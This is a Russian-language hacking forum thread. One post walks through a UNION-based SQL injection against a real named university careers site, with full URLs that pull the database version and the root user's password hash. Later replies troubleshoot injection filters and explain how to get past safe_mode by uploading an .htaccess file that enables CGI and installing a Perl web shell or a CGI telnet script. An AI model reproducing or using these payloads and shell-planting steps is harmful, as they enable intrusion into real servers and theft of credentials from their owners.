wildshaman, мб мы не будем флудить?? Возьмём за пример твою же скулю, тоторую ты выклодовал: Code: http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/* Мы видим что принтабельный столбец - 2 Проверим версию БД выполнив команду version() Code: http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11+from+mysql.user/* получаем: Code: 4.0.23a-log Это значит, что название таблиц и колонок прийдётся подбирать вручную, так как в 4-той версии нет прекрасной INFORMATION_SCHEMA Но изучив бд mysql мы уже знаем, что там присутствуют колонки user и password Имея эти даные мы составляем следующие запрос к базе данных: Code: http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,user,3,4,5,6,7,8,9,10,11+from+mysql.user/* Code: http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,password,3,4,5,6,7,8,9,10,11+from+mysql.user/* Но ведь не удобно состовлять несколько запросов, не так ди? Для этого можно использовать функцию concat() или concat_ws() Пример: Code: http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,concat_ws(0x3a,user,password),3,4,5,6,7,8,9,10,11+from+mysql.user/* И получить всё и сразу: Code: root:0e420e231935eccd 0x3a - это двоеточие в хексе! ################################## Для начала посоветую тебе почитать литературу по php и sql. После чего можешь приступать к чтению статтей по sql inj
2jecka3000 при запросе Code: http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/* вывелась двойка и тройка! можешь сипользовать любой!
на сервере safe_mode=on и disable_functions=passthru, shell_exec, proc_open. Могу инклудить php-код и читать папки и файлы только в папке htdocs и во вложенных, система FreeBSD 6.4-RELEASE-p3. Как при таком раскладе можно выполнять комманды на сервере? Подскажите люди добрые!
заливаешь в папку .htaccess пишешь в него Options ExecCGI AddType application/x-httpd-cgi .pl заливаешь в эту папку shell.pl ставишь на него chmod 755 и вуаля. Хороший перловый шелл - r57pws - гугл в помощь
Это у тя на страничке отображается...... --------------------------------------- Актуальные мероприятия партнеров 2
Вопросик есть http://www.site.ru/index.php?Id=-1+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,12+FROM+USERS+LIMIT+0,1+%23+ все цифры выводит на ура, но если например вместо 1 ил 3 написать user() или еще чет то еррор как исправить?
неа, не работает вот еще что нашел Id=-1+UNION+SELECT+0,user(),2,3,4,5,6,7,8,9,10,11,12+FROM+USERS+LIMIT+1,1+%23+ выводит Юзера Id=-1000+UNION+SELECT+0,user(),2,3,4,5,6,7,8,9,10,11,12+FROM+USERS+LIMIT+1,1+%23+ Не выводит Юзера но сам прикол что выводит только юзера, пишешь версию и еррор
позоду стоит проверка на кол символом, вводишь 0x2b норм вводишь чет длиннее и ниче, как можно обойти?
Залил 2 перловых файла одинакового содержания: PHP: #!/usr/bin/perl print "Content-Type:text/html\n\n"; print "HELLO WORLD!\n"; назвал их perl.pl и perl.cgi права у обоих 755 содержимое .htaccess было таким: PHP: Options +ExecCGI AddHandler cgi-script .cgi .pl и таким: PHP: Options ExecCGI AddHandler cgi-script .cgi .pl и таким: PHP: Options +ExecCGI AddHandler cgi-script .cgi .pl ScriptInterpreterSource registry и таким: PHP: Options +ExecCGI AddType application/x-httpd-cgi .pl .cgi и таким: PHP: Options +ExecCGI AddType application/x-httpd-cgi .pl .cgi ScriptInterpreterSource registry и таким: PHP: Options +ExecCGI AddHandler cgi-script .cgi .pl AddType application/x-httpd-cgi .pl .cgi права на .htaccess 744 Владелец скриптов: 80/4962 (uid/gid) У папки, в которой лежат скрипты права 777, владелец - 4962/4962 Запись в папку cgi-bin запрещена (права 755) И всё время - ошибка 500 Internal Server Error!!! Что делать я не знаю, подскажите пожалуйста! А да забыл написать, символы \r из концов строк я удалил.
Залей шелл который работает при включеном Safe-mode Или же пробуй это: http://www.rohitab.com/cgiscripts/cgitelnet.txt переменуй в *.cgi и помести в папку cgi-bin с правами 755 и с помощю скрипта переходи дальше..
